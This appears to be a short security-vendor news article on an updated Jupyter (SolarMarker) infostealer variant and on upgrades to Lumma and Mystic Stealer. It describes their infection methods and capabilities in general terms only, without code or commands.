HQ/EMEAFind out how we can help your business
A newly upgraded variant of the Jupyter infostealer malware has returned to the cybercriminal landscape.
Based on reports, this updated malware could now incorporate subtle but effective changes that could establish persistence on compromised systems secretly. Researchers have recently observed these new waves of Jupyter attacks. These attacks employ modified PowerShell commands and private vital signatures to make the malware appear as a legitimate file, enhancing its stealthiness.
The Jupyter infostealer malware is notorious for using SEO techniques for its operations.
The Jupyter infostealer malware is known by various names, such as Polazert, SolarMarker, and Yellow Cockatoo. This malware commonly manipulates search engine optimisation (SEO) techniques and malvertising to gain initial access and deceive users into downloading it from fake or sketchy websites.
In addition, this malware could harvest credentials, establish encrypted C2 communication, exfiltrate data, and execute arbitrary commands.
The latest iteration of the malware utilises various certificates to sign itself, giving it an appearance of legitimacy. However, once a target launches the fake installers, they could initiate an infection chain that involves an interim payload. This payload employs PowerShell to connect to a remote server and decode and execute the infostealer malware.
Developing these malware variants is a part of the ongoing evolution in the cybercriminal community. This evolution effectively reduces the challenges of infecting systems for less skilled or amateur actors.
For example, Lumma Stealer has received an upgrade that includes a loader and the ability to generate a build for improved obfuscation randomly. This transition enables the malware to progress from a data stealer to a more advanced threat that could launch second-stage attacks, even potentially deploying ransomware.
Furthermore, Mystic Stealer is another malware family that continuously receives enhancements from its developers. As of now, it could introduce a loader functionality in its recent versions alongside its information-stealing features.
The code for Mystic Stealer keeps evolving, expanding its data theft abilities and updating its network communication protocol to help distribute additional malware families, such as RedLine, DarkGate, and GCleaner.
Organisations should also improve their cybersecurity defences to remain one step ahead of these malware developments and hackers.
